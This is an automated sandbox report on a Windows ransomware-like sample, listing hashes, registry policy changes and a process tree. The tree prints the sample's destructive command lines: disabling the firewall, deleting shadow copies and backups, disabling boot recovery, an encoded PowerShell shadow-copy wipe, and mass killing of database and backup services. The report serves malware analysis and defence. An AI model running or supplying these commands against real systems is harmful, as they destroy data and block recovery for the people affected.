Analysis
- max time kernel: 62s
- max time network: 66s
- platform: windows7_x64
- resource: win7
- submitted: 22-07-2020 08:54
Static task: static1
Behavioral task: behavioral1
- Sample: Deniz_K_z_.bin.exe
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: Deniz_K_z_.bin.exe
- Resource: win10 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Deniz_K_z_.bin.exe
- Size: 3.4MB
- MD5: fc78e6e58352151fb77a4b92f239d381
- SHA1: 4dda3af9601922394f0c16713180beb2ec88c050
- SHA256: c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e
- SHA512: 4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489
Score: 10/10
Malware Config
Signatures
-
Processes:
Deniz_K_z_.bin.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Deniz_K_z_.bin.exe
-
Runs net.exe
-
Modifies service 2 TTPs 9 IoCs
Processes:
netsh.exe, vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas | netsh.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs | netsh.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups | netsh.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI | netsh.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig | netsh.exe
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
Processes:
Deniz_K_z_.bin.exe
description | ioc | process
File created | C:\Windows\System32\drivers\etc\host | Deniz_K_z_.bin.exe
-
Suspicious use of WriteProcessMemory 236 IoCs
Processes:
Deniz_K_z_.bin.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, net.exe, cmd.exe, cmd.exe
description | pid | process | target process | times logged
PID 824 wrote to memory of 1412 | 824 | Deniz_K_z_.bin.exe | cmd.exe | 4
PID 824 wrote to memory of 1440 | 824 | Deniz_K_z_.bin.exe | cmd.exe | 4
PID 824 wrote to memory of 864 | 824 | Deniz_K_z_.bin.exe | cmd.exe | 4
PID 824 wrote to memory of 796 | 824 | Deniz_K_z_.bin.exe | cmd.exe | 4
PID 1412 wrote to memory of 360 | 1412 | cmd.exe | netsh.exe | 4
PID 1440 wrote to memory of 1068 | 1440 | cmd.exe | vssadmin.exe | 4
PID 864 wrote to memory of 1064 | 864 | cmd.exe | vssadmin.exe | 4
PID 824 wrote to memory of 1828 | 824 | Deniz_K_z_.bin.exe | cmd.exe | 4
PID 824 wrote to memory of 1848 | 824 | Deniz_K_z_.bin.exe | cmd.exe | 4
PID 796 wrote to memory of 1184 | 796 | cmd.exe | taskkill.exe | 4
PID 824 wrote to memory of 1780 | 824 | Deniz_K_z_.bin.exe | cmd.exe | 4
PID 1828 wrote to memory of 1764 | 1828 | cmd.exe | net.exe | 4
PID 1764 wrote to memory of 1620 | 1764 | net.exe | net1.exe | 4
PID 1848 wrote to memory of 1588 | 1848 | cmd.exe | powershell.exe | 4
PID 1780 wrote to memory of 1552 | 1780 | cmd.exe | vssadmin.exe | 4
PID 1828 wrote to memory of 1904 | 1828 | cmd.exe | net.exe | 4
-
Modifies Windows Firewall 1 TTPs
-
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exe, vssadmin.exe, vssadmin.exe
pid | process
1068 | vssadmin.exe
1064 | vssadmin.exe
1552 | vssadmin.exe
-
System policy modification 1 TTPs 17 IoCs
Processes:
Deniz_K_z_.bin.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" | Deniz_K_z_.bin.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0" | Deniz_K_z_.bin.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0" | Deniz_K_z_.bin.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" | Deniz_K_z_.bin.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1" | Deniz_K_z_.bin.exe
-
Kills process with taskkill 14 IoCs
Processes:
taskkill.exe (14 instances)
pid | process
1868 | taskkill.exe
288 | taskkill.exe
1428 | taskkill.exe
1992 | taskkill.exe
1888 | taskkill.exe
1256 | taskkill.exe
824 | taskkill.exe
1564 | taskkill.exe
1064 | taskkill.exe
2036 | taskkill.exe
2024 | taskkill.exe
1184 | taskkill.exe
1472 | taskkill.exe
108 | taskkill.exe
-
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
vssvc.exe, taskkill.exe, WMIC.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, powershell.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe, taskkill.exe
description | pid | process
Token: SeBackupPrivilege | 1700 | vssvc.exe
Token: SeRestorePrivilege | 1700 | vssvc.exe
Token: SeAuditPrivilege | 1700 | vssvc.exe
Token: SeDebugPrivilege | 1184 | taskkill.exe
Token: SeIncreaseQuotaPrivilege | 1168 | WMIC.exe
Token: SeSecurityPrivilege | 1168 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1168 | WMIC.exe
Token: SeLoadDriverPrivilege | 1168 | WMIC.exe
Token: SeSystemProfilePrivilege | 1168 | WMIC.exe
Token: SeSystemtimePrivilege | 1168 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1168 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1168 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1168 | WMIC.exe
Token: SeBackupPrivilege | 1168 | WMIC.exe
Token: SeRestorePrivilege | 1168 | WMIC.exe
Token: SeShutdownPrivilege | 1168 | WMIC.exe
Token: SeDebugPrivilege | 1168 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1168 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1168 | WMIC.exe
Token: SeUndockPrivilege | 1168 | WMIC.exe
Token: SeManageVolumePrivilege | 1168 | WMIC.exe
Token: 33 | 1168 | WMIC.exe
Token: 34 | 1168 | WMIC.exe
Token: 35 | 1168 | WMIC.exe
Token: SeDebugPrivilege | 108 | taskkill.exe
Token: SeIncreaseQuotaPrivilege | 1168 | WMIC.exe
Token: SeSecurityPrivilege | 1168 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1168 | WMIC.exe
Token: SeLoadDriverPrivilege | 1168 | WMIC.exe
Token: SeSystemProfilePrivilege | 1168 | WMIC.exe
Token: SeSystemtimePrivilege | 1168 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1168 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1168 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1168 | WMIC.exe
Token: SeBackupPrivilege | 1168 | WMIC.exe
Token: SeRestorePrivilege | 1168 | WMIC.exe
Token: SeShutdownPrivilege | 1168 | WMIC.exe
Token: SeDebugPrivilege | 1168 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1168 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1168 | WMIC.exe
Token: SeUndockPrivilege | 1168 | WMIC.exe
Token: SeManageVolumePrivilege | 1168 | WMIC.exe
Token: 33 | 1168 | WMIC.exe
Token: 34 | 1168 | WMIC.exe
Token: 35 | 1168 | WMIC.exe
Token: SeDebugPrivilege | 1064 | taskkill.exe
Token: SeDebugPrivilege | 824 | taskkill.exe
Token: SeDebugPrivilege | 2036 | taskkill.exe
Token: SeDebugPrivilege | 1868 | taskkill.exe
Token: SeDebugPrivilege | 288 | taskkill.exe
Token: SeDebugPrivilege | 1428 | taskkill.exe
Token: SeDebugPrivilege | 1588 | powershell.exe
Token: SeDebugPrivilege | 2024 | taskkill.exe
Token: SeDebugPrivilege | 1472 | taskkill.exe
Token: SeDebugPrivilege | 1992 | taskkill.exe
Token: SeDebugPrivilege | 1888 | taskkill.exe
Token: SeDebugPrivilege | 1256 | taskkill.exe
Token: SeDebugPrivilege | 1564 | taskkill.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exe
pid | process
1588 | powershell.exe
1588 | powershell.exe
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Processes (tree depth shown in brackets)
[1] C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"
    - Checks whether UAC is enabled
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory
    - System policy modification
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\netsh.exe
        command line: netsh firewall set opmode disable
        - Modifies service
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\vssadmin.exe
        command line: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
        - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\vssadmin.exe
        command line: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
        - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im sql.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im winword.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im wordpad.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im outlook.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im thunderbird.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im oracle.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im excel.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im onenote.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im virtualboxvm.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im node.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im QBW32.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im WBGX.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im Teams.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\taskkill.exe
        command line: taskkill /f /im Flow.*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop DbxSvc
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop DbxSvc
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop OracleXETNSListener
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop OracleXETNSListener
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop OracleServiceXE
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop OracleServiceXE
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop AcrSch2Svc
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop AcrSch2Svc
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop AcronisAgent
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop AcronisAgent
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop Apache2.4
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop Apache2.4
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop SQLWriter
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop SQLWriter
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop MSSQL$SQLEXPRESS
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop MSSQLServerADHelper100
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop MSSQLServerADHelper100
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop MongoDB
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop MongoDB
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop SQLAgent$SQLEXPRESS
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop SQLBrowser
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop SQLBrowser
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop CobianBackup11
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop CobianBackup11
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop cbVSCService11
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop cbVSCService11
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop QBCFMontorService
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop QBCFMontorService
    [3] C:\Windows\SysWOW64\net.exe
        command line: net stop QBVSS
      [4] C:\Windows\SysWOW64\net1.exe
          command line: C:\Windows\system32\net1 stop QBVSS
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\vssadmin.exe
        command line: vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        command line: wmic shadowcopy delete
        - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\vssvc.exe
    command line: C:\Windows\system32\vssvc.exe
    - Modifies service
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads